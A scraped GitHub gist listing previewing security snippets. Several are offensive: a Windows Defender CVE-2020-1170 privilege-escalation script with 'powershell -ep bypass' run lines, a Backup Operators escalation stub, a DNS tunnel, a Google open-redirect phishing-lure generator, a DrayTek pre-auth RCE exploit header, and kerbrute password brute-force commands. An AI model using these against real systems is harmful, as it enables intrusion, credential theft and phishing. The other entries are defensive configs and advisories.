Skip to content

Instantly share code, notes, and snippets.

View kernel-sanders's full-sized avatar

Erik kernel-sanders

83 followers · 148 following
View GitHub Profile
@gwillcox-r7
gwillcox-r7 / DefenderArbitraryFileDelete.ps1
Created July 13, 2020 20:20
Windows Defender CVE-2020-1170 LPE Work Archive
# Taken from https://github.com/itm4n/CVEs/blob/master/CVE-2020-1170/DefenderArbitraryFileDelete.ps1 with minor modifications made where needed for Metasploit.
# All credits go to @itm4n for this PowerShell script!
# Testing
# powershell -ep bypass -c ". .\DefenderArbitraryFileDelete.ps1; DoMain -TargetFolder 'C:\ZZ_SANDBOX\WER'"
# Real
# powershell -ep bypass -c ". .\DefenderArbitraryFileDelete.ps1; DoMain -TargetFolder 'C:\ProgramData\Microsoft\Windows\WER'
$JobCode = {
function DoMpCmdRunLogFileWriteTriggerJob {
@D00MFist
D00MFist / osquery.conf
Last active May 27, 2024 20:03
Osquery Config
{
"options": {
"logger_snapshot_event_type": "true",
"schedule_splay_percent": 10
},
"platform": "darwin",
"schedule": {
"authorized_keys": {
"query": "SELECT * FROM users CROSS JOIN authorized_keys USING (uid);",
@ThunderGunExpress
ThunderGunExpress / SuRestore.cpp
Last active June 21, 2020 10:19
//https://decoder.cloud/2018/02/12/the-power-of-backup-operatos/
//https://github.com/decoder-it/BadBackupOperator/blob/master/SuBackup/SuBackup/SuBackup.cpp
//https://docs.microsoft.com/en-us/windows/win32/services/writing-a-servicemain-function
//https://docs.microsoft.com/en-us/windows/win32/vds/loading-vds
//Replace system command with your code. If DewIt() does not run, check if the vds service is running, it should be on-demand.
#define UNICODE
#include <windows.h>
#include <stdio.h>
#include <Psapi.h>
@eladshamir
eladshamir / DnsTunnel.cs
Created April 11, 2020 21:50
This simple program tunnels UDP DNS packets to a TCP port
using System;
using System.Net.Sockets;
using System.Net;
namespace DnsTunnel
{
class Program
{
static void OpenTunnel(int listenerPort, string targetHost, int targetPort)
{
@ustayready
ustayready / google_lure.py
Last active September 23, 2024 20:18
Generate phishing lures that exploit open-redirects from www.google.com using Google Docs
from __future__ import print_function
import pickle
import os.path
from googleapiclient.discovery import build
from google_auth_oauthlib.flow import InstalledAppFlow
from google.auth.transport.requests import Request
from apiclient import errors
import re
from bs4 import BeautifulSoup as Soup
@0xsha
0xsha / CVE-2020-8515.go
Last active March 30, 2024 20:52
CVE-2020-8515: DrayTek pre-auth remote root RCE
package main
/*
CVE-2020-8515: DrayTek pre-auth remote root RCE
Mon Mar 30 2020 - 0xsha.io
Affected:
@radiantly
radiantly / README.md
Last active November 12, 2021 23:24 — forked from lifehome/README.md
Cloudflare API v4 Dynamic DNS Update in Bash

Cloudflare DDNS bash client with systemd

This is a bash script to act as a Cloudflare DDNS client, useful replacement for ddclient.

How to use?

  1. Put the cfupdater files to /usr/local/bin
  2. chmod +x /usr/local/bin/cfupdater
  3. Create a systemd service unit at /etc/systemd/system/, the cfupdate.service is shown as an example.
  4. Create a systemd timer unit at the same location of the service unit, the cfupdate.timer is shown as an example.
  5. sudo systemctl enable cfupdate.timer
  6. sudo systemctl start cfupdate.timer
@SwitHak
SwitHak / 20190730-TLP-WHITE_URGENT11_VxWorks.MD
Last active June 5, 2020 08:12
Tracking vendors responses to URGENT/11 VxWorks vulnerabilities (Last updated: 2020-02-21 1019 UTC)

Advisory (URGENT/11)

UPDATE (2019-10-02 1241 UTC)

General

Armis released new information about the vulnerabilities scope. The vulnerabilities impact more RTOS than expected.

IP Stacks backstory

  • Some of the vulnerabilities discovered by Armis doesn't resides in VxWorks RTOS but in one part of it, the IP stack. This IP stack named IPNET stack comes from Interpeak AB, a company acquired by Wind River the editor of VxWorks RTOS, the 20th March 2006.
  • Before been acquired by Wind River, the Interpeak AB company sold IP stacks to several customers of them. Interpeak AB sold 2 major IP stacks named IPNET & IPLITE, IPLITE is a light version of IPNET.
@TarlogicSecurity
TarlogicSecurity / kerberos_attacks_cheatsheet.md
Created May 14, 2019 13:33
A cheatsheet with commands that can be used to perform kerberos attacks

Kerberos cheatsheet

Bruteforcing

With kerbrute.py:

python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>

With Rubeus version with brute module:

@lizthegrey
lizthegrey / attributes.rb
Last active March 27, 2025 02:16
Hardening SSH with 2fa
default['sshd']['sshd_config']['AuthenticationMethods'] = 'publickey,keyboard-interactive:pam'
default['sshd']['sshd_config']['ChallengeResponseAuthentication'] = 'yes'
default['sshd']['sshd_config']['PasswordAuthentication'] = 'no'